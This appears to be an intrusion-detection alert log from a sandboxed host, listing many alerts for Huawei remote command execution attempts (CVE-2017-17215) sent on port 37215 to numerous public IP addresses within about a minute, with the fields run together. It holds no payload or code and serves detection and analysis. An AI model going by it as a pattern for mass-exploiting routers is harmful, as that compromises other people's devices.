                                            06/14/24-10:43:58.274369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5033437215192.168.2.14197.102.204.78
                                            06/14/24-10:44:31.051770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4539637215192.168.2.14156.10.157.81
                                            06/14/24-10:43:41.847609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3610237215192.168.2.14156.195.146.2
                                            06/14/24-10:43:54.202238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4899837215192.168.2.1441.255.86.62
                                            06/14/24-10:44:33.149553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268837215192.168.2.14156.62.98.37
                                            06/14/24-10:44:00.324772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5567637215192.168.2.14197.51.62.143
                                            06/14/24-10:43:34.676891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3501637215192.168.2.1441.123.150.169
                                            06/14/24-10:44:18.766607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4036037215192.168.2.14156.234.223.3
                                            06/14/24-10:44:04.421038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658237215192.168.2.14197.14.76.182
                                            06/14/24-10:43:58.291743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655037215192.168.2.14197.217.248.156
                                            06/14/24-10:44:26.980588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419637215192.168.2.14156.210.229.20
                                            06/14/24-10:44:31.083916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5593037215192.168.2.14197.113.220.86
                                            06/14/24-10:44:12.616760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5476437215192.168.2.14156.191.59.125
                                            06/14/24-10:44:29.009379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164037215192.168.2.14156.141.33.94
                                            06/14/24-10:44:16.719099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4252037215192.168.2.14197.39.19.90
                                            06/14/24-10:43:58.289578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300037215192.168.2.14197.75.86.125
                                            06/14/24-10:44:02.381414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4540837215192.168.2.1441.165.20.17
                                            06/14/24-10:44:24.933509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885037215192.168.2.14197.89.187.246
                                            06/14/24-10:44:26.978171TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4108837215192.168.2.14197.217.199.242
                                            06/14/24-10:43:37.762525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697237215192.168.2.14156.68.246.42
                                            06/14/24-10:44:04.425101TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6033637215192.168.2.14197.29.239.198
                                            06/14/24-10:43:56.226614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4059837215192.168.2.1441.219.14.236
                                            06/14/24-10:44:35.180332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5721637215192.168.2.14197.87.232.194
                                            06/14/24-10:44:31.084253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4029837215192.168.2.14156.31.2.27
                                            06/14/24-10:44:06.470084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4435237215192.168.2.14156.145.106.92
                                            06/14/24-10:43:36.725233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5078237215192.168.2.14156.99.14.71
                                            06/14/24-10:43:48.033323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4568637215192.168.2.14156.189.173.243
                                            06/14/24-10:43:52.147148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405237215192.168.2.1441.22.236.91
                                            06/14/24-10:44:26.998451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770237215192.168.2.1441.128.149.155
                                            06/14/24-10:44:20.805354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552237215192.168.2.1441.152.246.121
                                            06/14/24-10:44:29.025856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112837215192.168.2.14156.6.215.60
                                            06/14/24-10:44:00.326591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361037215192.168.2.1441.143.101.125
                                            06/14/24-10:43:50.074158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4335837215192.168.2.14197.208.249.192
                                            06/14/24-10:44:29.014016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5950237215192.168.2.14156.207.52.203
                                            06/14/24-10:44:00.322160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628237215192.168.2.14156.108.48.253
                                            06/14/24-10:43:34.663182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3502637215192.168.2.14197.2.201.17
                                            06/14/24-10:44:04.410938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4954837215192.168.2.1441.131.127.211
                                            06/14/24-10:44:06.452189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3750037215192.168.2.1441.235.210.222
                                            06/14/24-10:44:29.027342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520437215192.168.2.14156.252.44.184
                                            06/14/24-10:43:52.161440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5008037215192.168.2.14197.121.214.68
                                            06/14/24-10:44:10.547420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415637215192.168.2.14156.175.209.52
                                            06/14/24-10:43:54.185986TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4885437215192.168.2.14156.229.187.47
                                            06/14/24-10:44:12.644179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819637215192.168.2.14156.7.115.81
                                            06/14/24-10:43:43.940885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4345437215192.168.2.14197.35.222.83
                                            06/14/24-10:44:35.177374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4265437215192.168.2.14156.231.138.241
                                            06/14/24-10:43:45.990751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684637215192.168.2.14156.104.222.77
                                            06/14/24-10:44:14.685361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5979437215192.168.2.14197.39.0.46
                                            06/14/24-10:44:31.054440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4267037215192.168.2.14156.188.160.128
                                            06/14/24-10:44:02.366246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5765637215192.168.2.1441.41.111.239
                                            06/14/24-10:44:29.010582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4667237215192.168.2.14156.254.58.255
                                            06/14/24-10:44:10.546580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5087037215192.168.2.14156.215.32.71
                                            06/14/24-10:43:50.072337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3521037215192.168.2.1441.3.93.224
                                            06/14/24-10:44:35.182154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4168637215192.168.2.1441.212.230.101
                                            06/14/24-10:44:20.827874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504837215192.168.2.14197.38.105.102
                                            06/14/24-10:44:26.997293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4742837215192.168.2.14197.87.86.82
                                            06/14/24-10:44:04.410477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4265437215192.168.2.1441.105.33.115
                                            06/14/24-10:43:48.019107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5544437215192.168.2.1441.192.205.126
                                            06/14/24-10:44:31.089840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475237215192.168.2.14197.125.95.200
                                            06/14/24-10:44:14.684091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3347237215192.168.2.14197.185.40.54
                                            06/14/24-10:43:34.662002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574037215192.168.2.1441.48.170.201
                                            06/14/24-10:43:54.200268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3602437215192.168.2.14197.227.131.187
                                            06/14/24-10:44:22.878094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4908437215192.168.2.1441.46.146.33
                                            06/14/24-10:44:04.424367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928637215192.168.2.14156.28.166.191
                                            06/14/24-10:44:18.776647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5243637215192.168.2.14197.249.241.203
                                            06/14/24-10:44:10.568597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998237215192.168.2.14197.238.89.161
                                            06/14/24-10:44:02.366412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4145437215192.168.2.14197.58.178.120
                                            06/14/24-10:43:54.200225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925637215192.168.2.1441.54.166.165
                                            06/14/24-10:43:41.846468TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060037215192.168.2.1441.7.213.46
                                            06/14/24-10:44:00.326679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4274237215192.168.2.14156.114.167.209
                                            06/14/24-10:44:06.448812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5669437215192.168.2.1441.47.211.197
                                            06/14/24-10:44:35.177969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200237215192.168.2.1441.163.91.244
                                            06/14/24-10:43:50.114877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5368237215192.168.2.14197.164.73.25
                                            06/14/24-10:44:04.406275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4924637215192.168.2.1441.217.250.236
                                            06/14/24-10:43:41.899047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4789637215192.168.2.1441.51.169.158
                                            06/14/24-10:44:29.024975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3319037215192.168.2.14197.118.25.7
                                            06/14/24-10:44:08.517901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327437215192.168.2.1441.230.194.68
                                            06/14/24-10:43:36.701852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5513037215192.168.2.14197.104.194.52
                                            06/14/24-10:44:04.411782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953837215192.168.2.14197.83.6.202
                                            06/14/24-10:43:58.291028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292837215192.168.2.14156.143.179.188
                                            06/14/24-10:44:16.714880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867437215192.168.2.1441.196.216.201
                                            06/14/24-10:44:18.766695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405037215192.168.2.14197.135.126.240
                                            06/14/24-10:44:31.052671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4044637215192.168.2.14197.175.223.234
                                            06/14/24-10:44:02.367176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5409037215192.168.2.14197.205.109.32
                                            06/14/24-10:43:34.662732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4738437215192.168.2.1441.172.243.251
                                            06/14/24-10:43:54.201680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5743237215192.168.2.14156.32.215.0
                                            06/14/24-10:44:12.646257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4437237215192.168.2.1441.208.12.57
                                            06/14/24-10:43:58.275904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3596037215192.168.2.14197.124.169.53
                                            06/14/24-10:43:50.071972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259637215192.168.2.14156.119.6.158
                                            06/14/24-10:44:00.339842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6069637215192.168.2.1441.243.44.125
                                            06/14/24-10:44:33.149212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5076237215192.168.2.14197.86.32.96
                                            06/14/24-10:43:43.968764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627037215192.168.2.14197.226.16.15
                                            06/14/24-10:43:45.967951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6082837215192.168.2.14156.49.26.239
                                            06/14/24-10:44:22.879544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5217237215192.168.2.14156.208.134.43
                                            06/14/24-10:44:24.947363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3410637215192.168.2.14197.18.238.13
                                            06/14/24-10:44:14.671837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295037215192.168.2.1441.229.43.66
                                            06/14/24-10:44:12.640827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275637215192.168.2.14197.229.211.181
                                            06/14/24-10:44:12.641077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5468637215192.168.2.1441.129.235.119
                                            06/14/24-10:43:41.849456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037037215192.168.2.1441.99.18.70
                                            06/14/24-10:44:24.915917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3853237215192.168.2.1441.248.227.166
                                            06/14/24-10:44:33.152087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5111637215192.168.2.14156.250.106.205
                                            06/14/24-10:44:14.671873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3914037215192.168.2.14197.120.162.88
                                            06/14/24-10:44:29.011703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486237215192.168.2.1441.254.237.83
                                            06/14/24-10:43:36.724899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3776237215192.168.2.14156.180.55.148
                                            06/14/24-10:43:36.699691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304037215192.168.2.14197.218.110.112
                                            06/14/24-10:43:36.704286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3464437215192.168.2.14197.25.104.255
                                            06/14/24-10:44:20.829316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287837215192.168.2.1441.62.227.213
                                            06/14/24-10:44:33.131515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819237215192.168.2.1441.232.208.194
                                            06/14/24-10:43:58.291338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3935437215192.168.2.14197.85.216.214
                                            06/14/24-10:44:02.368548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3508237215192.168.2.14197.244.246.193
                                            06/14/24-10:43:52.164789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607637215192.168.2.1441.28.169.151
                                            06/14/24-10:44:12.614424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5892437215192.168.2.14197.135.153.136
                                            06/14/24-10:44:14.673035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4862237215192.168.2.14197.8.193.237
                                            06/14/24-10:43:36.726522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5741037215192.168.2.14156.48.255.140
                                            06/14/24-10:43:58.277757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4787237215192.168.2.1441.65.231.252
                                            06/14/24-10:44:35.178404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3537637215192.168.2.14197.170.81.224
                                            06/14/24-10:44:18.775376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4321437215192.168.2.14197.90.30.98
                                            06/14/24-10:43:39.789157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5943237215192.168.2.14197.70.230.42
                                            06/14/24-10:43:48.033956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625037215192.168.2.14156.11.36.253
                                            06/14/24-10:44:27.002019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626837215192.168.2.14197.155.46.227
                                            06/14/24-10:43:56.229019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5317237215192.168.2.14156.122.23.207
                                            06/14/24-10:43:52.148997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4275637215192.168.2.1441.94.78.243
                                            06/14/24-10:44:10.542779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578037215192.168.2.1441.157.22.159
                                            06/14/24-10:44:27.001612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5933637215192.168.2.14197.37.101.102
                                            06/14/24-10:44:00.342616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960837215192.168.2.14156.156.106.96
                                            06/14/24-10:43:56.229183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691637215192.168.2.14197.73.207.194
                                            06/14/24-10:44:18.778156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457037215192.168.2.1441.248.2.52
                                            06/14/24-10:44:08.519405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832237215192.168.2.14156.8.77.42
                                            06/14/24-10:43:58.291828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062037215192.168.2.14197.119.47.36
                                            06/14/24-10:44:31.050829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4474837215192.168.2.14156.94.1.105
                                            06/14/24-10:44:16.733432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6072637215192.168.2.14156.60.60.101
                                            06/14/24-10:43:43.967569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401037215192.168.2.1441.236.85.29
                                            06/14/24-10:43:58.293373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5387237215192.168.2.14156.62.45.84
                                            06/14/24-10:44:26.985070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5522237215192.168.2.1441.70.105.46
                                            06/14/24-10:43:41.850043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853837215192.168.2.14197.36.168.96
                                            06/14/24-10:44:26.978493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327037215192.168.2.14156.104.83.233
                                            06/14/24-10:44:10.566502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5630637215192.168.2.14156.142.207.66
                                            06/14/24-10:43:37.762013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5592837215192.168.2.1441.153.255.196
                                            06/14/24-10:43:39.809498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4142637215192.168.2.1441.17.64.40
                                            06/14/24-10:43:37.759803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5112837215192.168.2.14156.221.41.190
                                            06/14/24-10:44:20.806607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105437215192.168.2.1441.117.199.21
                                            06/14/24-10:43:45.965518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255037215192.168.2.1441.112.188.18
                                            06/14/24-10:44:04.424841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721837215192.168.2.14197.93.120.75
                                            06/14/24-10:44:22.859190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674237215192.168.2.14156.135.97.188
                                            06/14/24-10:43:39.811104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550837215192.168.2.14197.66.231.125
                                            06/14/24-10:44:24.947165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883637215192.168.2.14197.218.215.168
                                            06/14/24-10:44:22.858128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865837215192.168.2.1441.185.54.184
                                            06/14/24-10:43:58.291618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4524837215192.168.2.14197.253.216.122
                                            06/14/24-10:44:10.547241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536037215192.168.2.14197.102.244.181
                                            06/14/24-10:44:00.336943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304037215192.168.2.14156.171.96.208
                                            06/14/24-10:43:43.967641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309037215192.168.2.1441.178.137.95
                                            06/14/24-10:43:56.228610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5777037215192.168.2.14156.184.58.92
                                            06/14/24-10:43:43.940957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5937237215192.168.2.1441.52.73.243
                                            06/14/24-10:43:34.677590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698837215192.168.2.14197.219.159.225
                                            06/14/24-10:43:58.276029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582237215192.168.2.1441.190.115.249
                                            06/14/24-10:44:08.517576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861437215192.168.2.1441.22.90.54
                                            06/14/24-10:44:10.582210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4777037215192.168.2.14197.195.190.4
                                            06/14/24-10:44:18.778292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4048637215192.168.2.14156.145.41.195
                                            06/14/24-10:44:20.805504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5955837215192.168.2.1441.233.173.114
                                            06/14/24-10:44:00.343996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5269637215192.168.2.14156.124.68.13
                                            06/14/24-10:44:29.011124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4327637215192.168.2.14197.134.163.12
                                            06/14/24-10:43:48.020770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362437215192.168.2.14156.61.10.211
                                            06/14/24-10:44:18.761369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469237215192.168.2.14197.152.48.213
                                            06/14/24-10:44:18.764102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3696437215192.168.2.1441.46.252.124
                                            06/14/24-10:44:10.568180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4296237215192.168.2.14156.100.24.37
                                            06/14/24-10:43:45.968301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4935237215192.168.2.14197.111.122.209
                                            06/14/24-10:43:52.149964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5477037215192.168.2.1441.224.12.206
                                            06/14/24-10:44:04.410089TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4124437215192.168.2.14156.96.105.37
                                            06/14/24-10:43:58.273070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349837215192.168.2.1441.7.80.119
                                            06/14/24-10:44:22.879574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3471437215192.168.2.14197.102.254.41
                                            06/14/24-10:44:04.409069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4146037215192.168.2.14156.107.44.222
                                            06/14/24-10:43:43.967063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388037215192.168.2.14156.5.254.183
                                            06/14/24-10:44:16.718834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5131037215192.168.2.1441.223.73.183
                                            06/14/24-10:43:39.812449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015837215192.168.2.14156.239.198.140
                                            06/14/24-10:44:14.668697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4937037215192.168.2.14156.122.81.98
                                            06/14/24-10:43:43.943628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958437215192.168.2.14156.47.240.188
                                            06/14/24-10:43:50.073908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079037215192.168.2.1441.222.248.10
                                            06/14/24-10:43:43.944169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5047637215192.168.2.14197.90.36.252
                                            06/14/24-10:43:34.679124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931237215192.168.2.14156.181.84.194
                                            06/14/24-10:44:08.517182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615037215192.168.2.14156.14.66.158
                                            06/14/24-10:43:58.275303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4724237215192.168.2.14197.208.183.13
                                            06/14/24-10:43:54.200463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5446437215192.168.2.1441.145.229.71
                                            06/14/24-10:44:00.323225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3914237215192.168.2.14197.174.170.227
                                            06/14/24-10:44:10.549015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5989837215192.168.2.14156.106.180.152
                                            06/14/24-10:44:24.913217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656437215192.168.2.1441.18.33.153
                                            06/14/24-10:43:58.273583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3675237215192.168.2.1441.218.177.185
                                            06/14/24-10:44:08.502183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5531637215192.168.2.1441.85.232.55
                                            06/14/24-10:43:43.972128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4359237215192.168.2.1441.43.22.251
                                            06/14/24-10:43:43.941406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093237215192.168.2.1441.119.233.111
